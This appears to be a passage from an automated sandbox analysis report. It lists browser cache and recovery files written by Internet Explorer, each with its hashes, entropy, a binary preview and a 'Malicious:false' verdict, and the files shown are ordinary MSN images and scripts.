                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F5285590-5CDD-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):188420
                                                                                                                                                                                                  Entropy (8bit):3.598645039111047
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:b1Z/2BfcYmu5kLTzGthZ/2Bfc/mu5kLTzGtl:AwK
                                                                                                                                                                                                  MD5:82FF1EAEE8EF8D9B80E4561FC41FF572
                                                                                                                                                                                                  SHA1:82D1C403E95B2320270228E49E94CC619DCB4F51
                                                                                                                                                                                                  SHA-256:998C50498A21D08FE767ABA0C2C2B1871D231ED77AED72D482656D8C28A84958
                                                                                                                                                                                                  SHA-512:AE2BF90C14BCCD51261B1E1E17B960DA0DFFFCD276EDBA92B7685D2EB34EE5FBE9C50BE0C08F0C0B12B1893AB40AC1DCBF19B2A2902483BFF5C5F755C692C26B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FC42181E-5CDD-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27380
                                                                                                                                                                                                  Entropy (8bit):1.8526729124823218
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:rZ/ZaQm761xkYFj7V2ikWtMMYW6/ohHx6/ohIuA:rZhXm+8YhA2+M76/ohR6/ohIJ
                                                                                                                                                                                                  MD5:DC6E8E477642BC6CAFC1C26752BFDA71
                                                                                                                                                                                                  SHA1:A89891311B06F455366BECD66B2C00CE72051BB8
                                                                                                                                                                                                  SHA-256:40B26858DF9CA5EE758BD4DBD75E9FBABDF2B2A88A95D7117772678632684363
                                                                                                                                                                                                  SHA-512:A33EF7581AA331CFA36E543943F02DDBC5077A4F9F690A99D910C58D9618735A76C3CF671AAD29999D86C9E34CFC8BC2D409353B86FC7DF2D6D7CC6F6574F285
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                  Entropy (8bit):7.034756800645552
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGm:u6tWu/6symC+PTCq5TcBUX4bc
                                                                                                                                                                                                  MD5:AAD34040ACF6B9FA9AC4BD067330F13E
                                                                                                                                                                                                  SHA1:7B453A4CB606848B88613D7DF9CABF076157ABE9
                                                                                                                                                                                                  SHA-256:2244C8E1455E9F78CC85CF8C9546589E959227DCA89BB70F43AC32C7811FD623
                                                                                                                                                                                                  SHA-512:3A7DC099869A2351EDA3A617E0BCE91FEC8A45637FD2220DA5B896DD45102D41B1B4C36AC8EB30F3A6A88055E566C708C4136CED15ED659842FDFE46E712C009
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ..............`.......`....
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\85-0f8009-68ddb2ab[1].js
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):391413
                                                                                                                                                                                                  Entropy (8bit):5.324500984847764
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:Rrfl3K/R9Sg/1xeUqkhmnid3WSqIjHSjaXiN4gxO0Dvq4FcG6Ix2K:d0/Rmznid3WSqIjHdMftHcGB3
                                                                                                                                                                                                  MD5:CA9F525C6154EF6AFF6C6FF9D0B07779
                                                                                                                                                                                                  SHA1:45F00ABA2CC9F7A1C6BF8691BED0AEB27F2590B9
                                                                                                                                                                                                  SHA-256:6F9FA21C6054E989A07CFC4AAE340FBE344BEE95BFB2DCE3CF616AF1FB4BAB5B
                                                                                                                                                                                                  SHA-512:621B53C05B4D6858EAA622378689BF68CCA63B03805DE62C3AAA510D6EACE94CAB05C30738AA8BF530FCC0FD72745127F40F95FC6ADCEA7038A26589EC926FA7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                  Preview: var awa,behaviorKey,Perf,globalLeft,Gemini,Telemetry,utils,data,MSANTracker,deferredCanary,g_ashsC,g_hsSetup,canary;window._perfMarker&&window._perfMarker("TimeToJsBundleExecutionStart");define("jqBehavior",["jquery","viewport"],function(n){return function(t,i,r){function u(n){var t=n.length;return t>1?function(){for(var i=0;i<t;i++)n[i]()}:t?n[0]:f}function f(){}if(typeof t!="function")throw"Behavior constructor must be a function";if(i&&typeof i!="object")throw"Defaults must be an object or null";if(r&&typeof r!="object")throw"Exclude must be an object or null";return r=r||{},function(f,e,o){function c(n){n&&(typeof n.setup=="function"&&l.push(n.setup),typeof n.teardown=="function"&&a.push(n.teardown),typeof n.update=="function"&&v.push(n.update))}var h;if(o&&typeof o!="object")throw"Options must be an object or null";var s=n.extend(!0,{},i,o),l=[],a=[],v=[],y=!0;if(r.query){if(typeof f!="string")throw"Selector must be a string";c(t(f,s))}else h=n(f,e),r.each?c(t(h,s)):(y=h.length>0,
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAyuliQ[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):435
                                                                                                                                                                                                  Entropy (8bit):7.145242953183175
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/W/6TKob359YEwQsQP+oaNwGzr5jl39HL0H7YM7:U/6pbJPgQP+bVRt9r0H8G
                                                                                                                                                                                                  MD5:D675AB16BA50C28F1D9D637BBEC7ECFF
                                                                                                                                                                                                  SHA1:C5420141C02C83C3B3A3D3CD0418D3BCEABB306A
                                                                                                                                                                                                  SHA-256:E11816F8F2BBC3DC8B2BE84323D6B781B654E80318DC8D02C35C8D7D81CB7848
                                                                                                                                                                                                  SHA-512:DA3C25D7C998F60291BF94F97A75DE6820C708AE2DF80279F3DA96CC0E647E0EB46E94E54EFFAC4F72BA027D8FB1E16E22FB17CF9AE3E069C2CA5A22F5CC74A4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs................HIDAT8O.KK.Q.....v...me....H.}.D.............A$.=..=h.J..:..H...;qof?.M........?..gg.j*.X..`/e8.10...T......h..\?..7)q8.MB..u.-...?..G.p.O...0N.!.. .......M............hC.tVzD...+?....Wz}h...8.+<..T._..D.P.p&.0.v....+r8.tg..g .C..a18G...Q.I.=..V1......k...po.+D[^..3SJ.X..x...`..@4..j..1x'.h.V....3..48.{$BZW.z.>....w4~.`..m....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAzb5EX[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):371
                                                                                                                                                                                                  Entropy (8bit):6.987382361676928
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPkR/ikU2KG4Lph60GGHyY6Gkcz6SpBUSrwJuv84ipEuPJT+p:6v/78/Y2K7m0GGSXEBUQZkRbPBs
                                                                                                                                                                                                  MD5:13B47B2824B7DE9DC67FD36A22E92BBE
                                                                                                                                                                                                  SHA1:5118862BA67A32F8F9E2723408CF5FAF59A3282C
                                                                                                                                                                                                  SHA-256:9DB94F939C16B001228CA30AF19C108F05C4F1A9306ECC351810B18C57F271D4
                                                                                                                                                                                                  SHA-512:001A4A6E1B08B32C713D7878E00E37BF061DCFC34127885FB300478E929BC7A8FF59D426FE05183C0DDA605E8EF09C4E4769A038787838CC8A724B3233145C6D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzb5EX.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...#...#.x.?v....IDAT8O.1N.A.E.x....J...!..J.....Ctp....;."..HI...@...xa.Q...W...o..'.o{.....\.Y.l...........O..7.;H....*..pR..3.x6.........lb3!..J8/.e....F...&.x..O2.;..$b../.H}AO..<)....p$...eoa<l9,3.a....D..?..F..H...eh......[........ja.i.!.........Z.V....R.A..Z..x.s....`...n..E......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB10MkbM[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):965
                                                                                                                                                                                                  Entropy (8bit):7.720280784612809
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:T2PqcKHsgioKpXR3TnVUvPkKWsvIos6z8XYy8xcvn1a:5PZK335UXkJsgIyScf1a
                                                                                                                                                                                                  MD5:569B24D6D28091EA1F76257B76653A4E
                                                                                                                                                                                                  SHA1:21B929E4CD215212572753F22E2A534A699F34BE
                                                                                                                                                                                                  SHA-256:85A236938E00293C63276F2E4949CD51DFF8F37DE95466AD1A571AC8954DB571
                                                                                                                                                                                                  SHA-512:AE49823EDC6AE98EE814B099A3508BA1EF26A44D0D08E1CCF30CAB009655A7D7A64955A194E5E6240F6806BC0D17E74BD3C4C9998248234CA53104776CC00A01
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...#...#.x.?v...ZIDAT8OmS[h.g.=s..$n...]7.5..(.&5...D..Z..X..6....O.-.HJm.B..........j..Z,.D.5n.1....^g7;;.;3.w../........}....5....C==}..hd4.OO..^1.I..*.U8.w.B..M0..7}.........J....L.i...T...(J.d*.L..sr.......g?.aL.WC.S..C...(.pl..}[Wc..e.............[...K......<...=S......]..N/.N....(^N'.Lf....X4.....A<#c.....4fL.G..8..m..RYDu.7.>...S....-k.....GO..........R.....5.@.h...Y$..uvpm>(<..q.,.PY....+...BHE..;.M.yJ...U<..S4.j..g....x.............t".....h.....K...~._....:...qg.).~..oy..h..u6....i._n...4T..Z.#.....0....L......l..g!..z...8.I&....,iC.U.V,j_._...9.....8<...A.b.|.^..;..2......./v .....>....O^..;.o...n .'!k\l..C.a.I$8.~.0...4j..~5.\6...z?..s.qx.u....%...@.N.....@..HJh].....l..........#'.r.!../..N.d!m...@.........qV...c..X....t.1CQ..TL....r3.n.."..t.....`...$...ctA....H.p0.0.A..IA.o.5n.m...\.l.B>....x..L.+.H.c6..u...7....`....M....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB14EN7h[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):10663
                                                                                                                                                                                                  Entropy (8bit):7.715872615198635
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BpV23EiAqPWo2rhmHI2NF5IZr9Q8yES4+e5B0k9F8OdqmQzMs:7PiAqnHICF5IVVyxk5BB9tdq3Z
                                                                                                                                                                                                  MD5:A1ED4EB0C8FE2739CE3CB55E84DBD10F
                                                                                                                                                                                                  SHA1:7A185F8FF5FF1EC11744B44C8D7F8152F03540D5
                                                                                                                                                                                                  SHA-256:17917B48CF2575A9EA5F845D8221BFBC2BA2C039B2F3916A3842ECF101758CCB
                                                                                                                                                                                                  SHA-512:232AE7AB9D6684CDF47E73FB15B0B87A32628BAEEA97709EA88A24B6594382D1DF957E739E7619EC8E8308D5912C4B896B329940D6947E74DCE7FC75D71C6842
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14EN7h.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...E.(.Y....E.D....=h...<t.S......5i..9.. .:..".R..i...dt&..J..!...P..m&..5`VE..|..j.d...i..qL=x...4.S@..u.4.J.u.....Ju%.FEU..I.*.]#4.3@.6...yH...=..}.#....bx...1s...O.....7R....."U...........jY.'.L.0..ST.M.:t3...9...2.:.0$...V..A..w..o..T.Y#...=).K..+.....XV...n;......}.37.........:.!E.P.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%-...uE,.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB15AQNm[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):23518
                                                                                                                                                                                                  Entropy (8bit):7.93794948271159
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7XNEQW4OGoP8X397crjXt1/v2032/EcJ+eGovCO2+m5fC/lWL2ZSwdeL5HER4ycP:7uf4ik390Xt1vP2/RVCqm5foMyDdeiRU
                                                                                                                                                                                                  MD5:C701BB9A16E05B549DA89DF384ED874D
                                                                                                                                                                                                  SHA1:61F7574575B318BDBE0BADB5942387A65CAB213C
                                                                                                                                                                                                  SHA-256:445339480FB2AE6C73FF3A11F9F9F3902588BFB8093D5CC8EF60AF8EF9C43B35
                                                                                                                                                                                                  SHA-512:AD226B2FE4FF44BBBA00DFA6A7C572BD2433C3821161F03A811847B822BA4FC9F311AD1A16C5304ABE868B0FA1F548B8AEF988D87345AEB579B9F31A74D5BF3C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB15AQNm.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=868&y=379
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...CKHh.........i.@.....i..lR2...MpR..^E....&EYv..N.j...e..j..U,..*..BZ...qQM.dT....@..8..s..i..}....n..D...i.....VC.HK"..T.iX.f.v&.}.v..7..jV.....jF.c..NhS.L.b>x".D...,..G.Z..!.i..VO..._4.@X.].p..].5b+...Uk...((@.s'..?Hv............\z.z.JGih..}*S.....T..WBZ...'.T?6..j.H"....*..%p3.YnEc.W.f.^......Q.....#..k..Z......I:..MC..H.S..#..Y ..A.Zr...T..H..P..[..b.C.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1cGyFI[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):18494
                                                                                                                                                                                                  Entropy (8bit):7.885933738641973
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7yAZw2yMdG20RGG+he090lvN+m9UWRpZwi+em0+z:7V6Md/nG+he0y+mmKHwt0e
                                                                                                                                                                                                  MD5:69BBB5B8A0C754D084EA6CFEDF644A7B
                                                                                                                                                                                                  SHA1:B01FE2EB9432988B309CC2E892D9B08200EB6FDE
                                                                                                                                                                                                  SHA-256:FEC96B2FA831E9F29F91CB6E08827575FC8361C1AC1803FF7A0A0E30F55235BB
                                                                                                                                                                                                  SHA-512:375C6DEE32AC9B4EEFFA07F75F96F291A4E6EAF9E6C6A4B622EE805B7D2AC5A108FF67BF888F50F1A9F83A8F7C37AFAF1744AADDE4189EEDBEBB40DC3DD506B8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cGyFI.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                  Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....:....J)h......J)h......J)h......J)h......J)h......J)h......J)h......J)h......J)h......J)h......J)h......J)h......J)h......J)h......J)h......J)h......J)h......J)h......J)h...Z(.(.....Z(.(.....Z(.(.....Z(.(.....Z(.(.....Z(.(.....Z(.(.....Z(.(.....Z(.(.....Z(.(.....Z(.(.....Z(.(.....)c...j*...........O..y...A...F..WP._...J.".K.4R.Vh%..P.QKE.%..P.QKE.%..P.QKE.%..P.QKE
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1cYP7S[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 200x200, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):13512
                                                                                                                                                                                                  Entropy (8bit):7.908140225288658
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xYyEs5q5sKa2cVRG/Q9EOUTTS3kYi8UMxx4DERaQ174NpqXwWH/xkmM8Gg3YKpy:OypAn346j3KioxQERXTTfeN8HI1
                                                                                                                                                                                                  MD5:CF7D453A41A16DFEF30B3100EC14778B
                                                                                                                                                                                                  SHA1:953259E27C54320B74B682010B1C5E7A2DA65392
                                                                                                                                                                                                  SHA-256:2253D54C53D46988543D321865D12AC30558381C9EF5ED760C4DBB3EFA4EDE14
                                                                                                                                                                                                  SHA-512:5AD4C0FEC8D1148F5F4C81DB0B16EA89D17E28A00A32981E19A281FCC26A483495B00C2A9C39370EF900AA058306431C5652A8DD1BCDD2CA4C68FBD72293F9F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cYP7S.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..~.z...;f...yd.v.....ET...jr\.Sw...T..e......7..O.....9X...+,j7r}+.a...:=....w.C,.X..k.rSWc.s..Pe..3.p...Y..3\..#u.$ze.....*t55..N.y..g=k.~/.......^n\D..I!. .....J.J.....,<...+...Q]g0QFih..&...rh`.|.....s.M.iW7ks40.......K.rF.G.z+....5.....Q...7.o|.jW...#...v?.\..e..F0?.5A..Kol.0..}.7P..'P.$.A'..4.j..D..x.Z.!1..X._...?..|.p...cW..d..Z)~.._.X..0.......5.x....
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1cYVyx[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):5119
                                                                                                                                                                                                  Entropy (8bit):7.899988158637363
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:BGAaEo9uBM8tOdnYmBreJYdfX+RodfbMjso59BIJi2dVpq0:BCmtwnBBiJ6/+RAP+GJdbq0
                                                                                                                                                                                                  MD5:59A525C6AC84E82C9BC4F6E621035CF4
                                                                                                                                                                                                  SHA1:CA336312BB3D951B74FE35221A3EDC1132C8FEF9
                                                                                                                                                                                                  SHA-256:D67DEE96168DE1B9678006B32962484D68E65054470DA38ADB9974426EA8A0E9
                                                                                                                                                                                                  SHA-512:CEAC5C79C0C1BB79B1C00FEA39A7B1F0B50846F83C89670E94E8A3AB39AE890A80D6812225B4F557DAB82176BB4CF07C5931677EC8563F83742C8679E3D07936
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cYVyx.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=658&y=247
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....Rb.7.j6.MF..]...].......M.!.E%-!.Z...k.Z...\...U.+...h.T..N0d.c.v.iKa.jwv0$0.F.T..U.e.8.$...U%}.J...k;...d.>..cTZ@.>.}*Y.8 .1...V\....-.E../|.3..3.Ury.<.9.5Cz..)....A...9"....q....a.#....b.`...N.6....]....._...y..*8&*...v0t.....H.l...Oj...x..N.#..z.......f..sX..:...3.EF.&.sLL..ZJ.!..L.Wn..{S*.aKE.......{...C|.8.{-.p..G. .E.....QgF/.!.[5.._rc....X.Z.F.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1cYZkP[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):1686
                                                                                                                                                                                                  Entropy (8bit):7.707808482555425
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:BI/XAo0XxDuLHeOWXG4OZ7DAJuLHenX3IFeoY0TEXCFMKOiQxyiYjhu398zle8AU:BGpuERAAeyQXZtiQxpiUt8zlFb
                                                                                                                                                                                                  MD5:A2142B55C237871570CAD33675E305A3
                                                                                                                                                                                                  SHA1:CD712E49E7CCCEEF1003888D6694AC25C68B8789
                                                                                                                                                                                                  SHA-256:C177E5FFAEDA5D6D09CF90C01C3BC712C9769FD81CE72CEB9712C55C6617B43C
                                                                                                                                                                                                  SHA-512:2662F4AA2C3E9220EAFF417BD29149F72198E235D0206EC13DEB88C43BC36250AAC77AE9C8CFCADC42347939601A9918475D9E498C2B767E4AC967E9BF732957
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cYZkP.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=560&y=312
